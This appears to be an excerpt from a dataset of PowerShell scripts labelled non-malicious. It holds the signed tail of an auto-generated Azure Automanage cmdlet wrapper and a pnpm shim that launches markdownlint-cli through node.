${HttpPipelineAppend}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Automanage.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.Automanage.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be prepended to the front of the pipeline ${HttpPipelinePrepend}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.Automanage.Category('Runtime')] [System.Uri] # The URI for the proxy server to use ${Proxy}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Automanage.Category('Runtime')] [System.Management.Automation.PSCredential] # Credentials for a proxy server to use for the remote call ${ProxyCredential}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.Automanage.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Use the default credentials for the proxy ${ProxyUseDefaultCredentials} ) begin { try { $outBuffer = $null if ($PSBoundParameters.TryGetValue('OutBuffer', [ref]$outBuffer)) { $PSBoundParameters['OutBuffer'] = 1 } $parameterSet = $PSCmdlet.ParameterSetName $mapping = @{ List = 'Az.Automanage.private\Get-AzAutomanageOperation_List'; } $wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand(($mapping[$parameterSet]), [System.Management.Automation.CommandTypes]::Cmdlet) $scriptCmd = {& $wrappedCmd @PSBoundParameters} $steppablePipeline = $scriptCmd.GetSteppablePipeline($MyInvocation.CommandOrigin) $steppablePipeline.Begin($PSCmdlet) } catch { throw } } process { try { $steppablePipeline.Process($_) } catch { throw } } end { try { $steppablePipeline.End() } catch { throw } } } # SIG # Begin signature block # MIInwgYJKoZIhvcNAQcCoIInszCCJ68CAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAo644RSVBdjS1e # x7VaqfFWEp4l5cfsWpTWYo0e8Ep7kKCCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGaIwghmeAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIDDE035qhvoMtrbHCFim3LeI # dyNGFys0rK69XIVjTr4FMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAkduf3X/+bXGRDgWTGz/uCKKATF4sEIhS9nf4Vj7Zi4ymVjbwegmbY82O # dcjAo8ZQHPggzprBN8VZxnCc2yrit/TQwcb5EizhxyNJVymLcfp8mq+pqL39NM/9 # b059C0wJmP12Sb3bvIndj3VD4qjHQ7iDi6THj97T7prOFgk4q4n4g98M+WT/Fo7G # TiYGn8+eCkyVnY4g1ZZqJ+GWLsy60TJHpQt36X0Z7Toi9Zf22dXcYYPPPfn7Ft4t # 6We84lwL6vltSmGBF+ixhPW3egmh2osf28BO0G19y5llPYzl4IMXDWE6hrZwjtOe # W9BV6PL+cVmRGFKQnrLBOJnh6B+fr6GCFywwghcoBgorBgEEAYI3AwMBMYIXGDCC # FxQGCSqGSIb3DQEHAqCCFwUwghcBAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq # hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCAF0lhOYFrBlBT79bmBU5Es9bUmHPAe5YHBPPs7tKeOEwIGZh/Gspok # GBMyMDI0MDQyMzEzMTUyMi41NDRaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO # OjhENDEtNEJGNy1CM0I3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNloIIRezCCBycwggUPoAMCAQICEzMAAAHj372bmhxogyIAAQAAAeMwDQYJ # KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx # MDEyMTkwNzI5WhcNMjUwMTEwMTkwNzI5WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl # cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjo4RDQxLTRC # RjctQjNCNzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAL6kDWgeRp+fxSBUD6N/yuEJ # pXggzBeNG5KB8M9AbIWeEokJgOghlMg8JmqkNsB4Wl1NEXR7cL6vlPCsWGLMhyqm # scQu36/8h2bx6TU4M8dVZEd6V4U+l9gpte+VF91kOI35fOqJ6eQDMwSBQ5c9ElPF # UijTA7zV7Y5PRYrS4FL9p494TidCpBEH5N6AO5u8wNA/jKO94Zkfjgu7sLF8SUdr # c1GRNEk2F91L3pxR+32FsuQTZi8hqtrFpEORxbySgiQBP3cH7fPleN1NynhMRf6T # 7XC1L0PRyKy9MZ6TBWru2HeWivkxIue1nLQb/O/n0j2QVd42Zf0ArXB/Vq54gQ8J # IvUH0cbvyWM8PomhFi6q2F7he43jhrxyvn1Xi1pwHOVsbH26YxDKTWxl20hfQLdz # z4RVTo8cFRMdQCxlKkSnocPWqfV/4H5APSPXk0r8Cc/cMmva3g4EvupF4ErbSO0U # NnCRv7UDxlSGiwiGkmny53mqtAZ7NLePhFtwfxp6ATIojl8JXjr3+bnQWUCDCd5O # ap54fGeGYU8KxOohmz604BgT14e3sRWABpW+oXYSCyFQ3SZQ3/LNTVby9ENsuEh2 # UIQKWU7lv7chrBrHCDw0jM+WwOjYUS7YxMAhaSyOahpbudALvRUXpQhELFoO6tOx # /66hzqgjSTOEY3pu46BFAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQUsa4NZr41Fbeh # Z8Y+ep2m2YiYqQMwHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD # VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j # cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG # CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw # MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD # CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBALe+my6p1NPMEW1t # 70a8Y2hGxj6siDSulGAs4UxmkfzxMAic4j0+GTPbHxk193mQ0FRPa9dtbRbaezV0 # GLkEsUWTGF2tP6WsDdl5/lD4wUQ76ArFOencCpK5svE0sO0FyhrJHZxMLCOclvd6 # vAIPOkZAYihBH/RXcxzbiliOCr//3w7REnsLuOp/7vlXJAsGzmJesBP/0ERqxjKu # dPWuBGz/qdRlJtOl5nv9NZkyLig4D5hy9p2Ec1zaotiLiHnJ9mlsJEcUDhYj8PnY # nJjjsCxv+yJzao2aUHiIQzMbFq+M08c8uBEf+s37YbZQ7XAFxwe2EVJAUwpWjmtJ # 3b3zSWTMmFWunFr2aLk6vVeS0u1MyEfEv+0bDk+N3jmsCwbLkM9FaDi7q2HtUn3z # 6k7AnETc28dAvLf/ioqUrVYTwBrbRH4XVFEvaIQ+i7esDQicWW1dCDA/J3xOoCEC # V68611jriajfdVg8o0Wp+FCg5CAUtslgOFuiYULgcxnqzkmP2i58ZEa0rm4LZymH # BzsIMU0yMmuVmAkYxbdEDi5XqlZIupPpqmD6/fLjD4ub0SEEttOpg0np0ra/MNCf # v/tVhJtz5wgiEIKX+s4akawLfY+16xDB64Nm0HoGs/Gy823ulIm4GyrUcpNZxnXv # E6OZMjI/V1AgSAg8U/heMWuZTWVUMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ # mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh # dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1 # WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB # BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK # NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg # fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp # rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d # vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9 # 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR # Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu # qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO # ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb # oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6 # bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t # AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW # BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb # UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz # aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku # aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA # QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2 # VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu # bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw # LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93 # d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt # MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q # XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6 # U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt # I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis # 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp # kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0 # sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e # W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ # sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7 # Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0 # dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ # tB1VM1izoXBm8qGCAtcwggJAAgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh # bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjo4 # RDQxLTRCRjctQjNCNzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy # dmljZaIjCgEBMAcGBSsOAwIaAxUAPYiXu8ORQ4hvKcuE7GK0COgxWnqggYMwgYCk # fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF # AOnSLW4wIhgPMjAyNDA0MjMyMDUxNThaGA8yMDI0MDQyNDIwNTE1OFowdzA9Bgor # BgEEAYRZCgQBMS8wLTAKAgUA6dItbgIBADAKAgEAAgIC3QIB/zAHAgEAAgIklzAK # AgUA6dN+7gIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIB # AAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAL5g/H2OsBvN7sRs # WQpifcZ3xYuCaQCapfehI/sIyCMsEeFt/2Io5kSBiNhwofo99Xxk/KCzCACcFbyA # 216UwvxZQbZWgBcarXLP7Rn9Q+U10U19mENvKVuFTzZt3+19K/W7+QQ4Y0MOWaYZ # uM2O+a3lHbrYuq3jAheJ+WJ8OBwrMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTACEzMAAAHj372bmhxogyIAAQAAAeMwDQYJYIZIAWUD # BAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0B # CQQxIgQgbl7dcLX2u/8U+qCYCJ6So1J0xcTjuHY451z177x6/mkwgfoGCyqGSIb3 # DQEJEAIvMYHqMIHnMIHkMIG9BCAz1COr5bD+ZPdEgQjWvcIWuDJcQbdgq8Ndj0xy # MuYmKjCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9u # MRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp # b24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB # 49+9m5ocaIMiAAEAAAHjMCIEIAjbaHNr0MEVS4sdIKFzDEisoKgKMPqA12+DiwHa # 14RcMA0GCSqGSIb3DQEBCwUABIICAEb8AwMsv30weItXJDop4kvLkgwZNyjpOHeq # CXIaQp1KuQhLlZuJyRCe6mvMaEqCiqBzkk1dqmEgKtd+C8UgXmYYFbEH7PIdXtgL # NFtfVDSsTJvNPyAgxF3V/hrFkDhPGT603gnDHa5DXJChMHFyQTVk69lO2GNQ5wlj # Yl6Plm1OnTO88AbYbx3eQpSne9qII1ixapTWdvAqWIEPAKmRkH+ju7DlQ3lQq5QK # Ar7E/I8hK2hYxgEKVH5veS+IlPUxXdk3pc9PGxAwcSPJf5Ip5Yyg7GRTLueflhpJ # bywjB9dfVTetJ5C/ZFr78FlqWBBpFO5wTuFAUk8DOGMZ0U4Vam2cMOxLKUBG0Td0 # RRpTJnLcD5ve43Zm6l2WVmVzS7BKkHKTjevWeRgHio417MtezPDc3aUG6lI+IZr1 # 1ZAa7++o/qDvu4smT/lm+kaLkLcxxB681NsxRurmW7hQ0rbl+w/hrP1wuWaSj0ak # LpxRLT/wcr95kF4XtML87JqTrXkPaUlAYa4GhIUzX1wSTfYX+M+ofnOMpQhaKszg # jLMGXb2iltFqKI/GY6QpxpFg6NJs0ZEuBWn+ZYAcaoBC5TUr2CfLsXtz1giMuBFN # 59fJxNzIo7lWRroVKw6a4MbvAUVNN2f3IUaxZAnA60erVQUrpjhJdodevOoVAUr5 # idhaMpu7 # SIG # End signature block
combined_dataset/train/non-malicious/sample_31_49.ps1
sample_31_49.ps1
#!/usr/bin/env pwsh $basedir=Split-Path $MyInvocation.MyCommand.Definition -Parent $exe="" $pathsep=":" $env_node_path=$env:NODE_PATH $new_node_path="C:\practice\demo\quick-reference\node_modules\.pnpm\node_modules" if ($PSVersionTable.PSVersion -lt "6.0" -or $IsWindows) { # Fix case when both the Windows and Linux builds of Node # are installed in the same directory $exe=".exe" $pathsep=";" } else { $new_node_path="/mnt/c/practice/demo/quick-reference/node_modules/.pnpm/node_modules" } if ([string]::IsNullOrEmpty($env_node_path)) { $env:NODE_PATH=$new_node_path } else { $env:NODE_PATH="$env_node_path$pathsep$new_node_path" } $ret=0 if (Test-Path "$basedir/node$exe") { # Support pipeline input if ($MyInvocation.ExpectingInput) { $input | & "$basedir/node$exe" "$basedir/../../../../node_modules/.pnpm/markdownlint-cli@0.39.0/node_modules/markdownlint-cli/markdownlint.js" $args } else { & "$basedir/node$exe" "$basedir/../../../../node_modules/.pnpm/markdownlint-cli@0.39.0/node_modules/markdownlint-cli/markdownlint.js" $args } $ret=$LASTEXITCODE } else { # Support pipeline input if ($MyInvocation.ExpectingInput) { $input | & "node$exe" "$basedir/../../../../node_modules/.pnpm/markdownlint-cli@0.39.0/node_modules/markdownlint-cli/markdownlint.js" $args } else { & "node$exe" "$basedir/../../../../node_modules/.pnpm/markdownlint-cli@0.39.0/node_modules/markdownlint-cli/markdownlint.js" $args } $ret=$LASTEXITCODE } $env:NODE_PATH=$env_node_path exit $ret
combined_dataset/train/non-malicious/Get-Hostname_1.ps1
Get-Hostname_1.ps1
